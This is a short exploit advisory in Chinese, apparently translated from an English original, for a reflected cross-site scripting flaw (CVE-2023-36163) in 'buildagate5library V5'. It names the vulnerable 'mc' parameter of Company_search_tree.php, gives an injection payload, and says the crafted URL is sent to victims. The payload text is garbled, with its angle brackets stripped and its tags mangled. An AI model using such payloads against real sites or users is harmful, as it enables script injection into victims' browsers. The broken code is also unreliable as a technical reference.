#利用标题: buildagate5library V5-反射的跨站点脚本(XSS)
#date: 06/07/2023
#利用作者: Idan Malihi
#供应商HomePage:无
#版本: 5
#测试在: Microsoft Windows 10 Pro
#CVE : CVE-2023-36163
#POC:
攻击者只需要找到脆弱的参数(MC=)并注入JS代码:
'ScriptPrompt('XSS');/scriptDiv ID='aa
之后,攻击者需要将带有JS代码的完整URL发送给受害者并注入其浏览器。
#payload:
Company_search_tree.php?mc=aaa'scriptPrompt('xss');/scriptDiv ID='aaaa
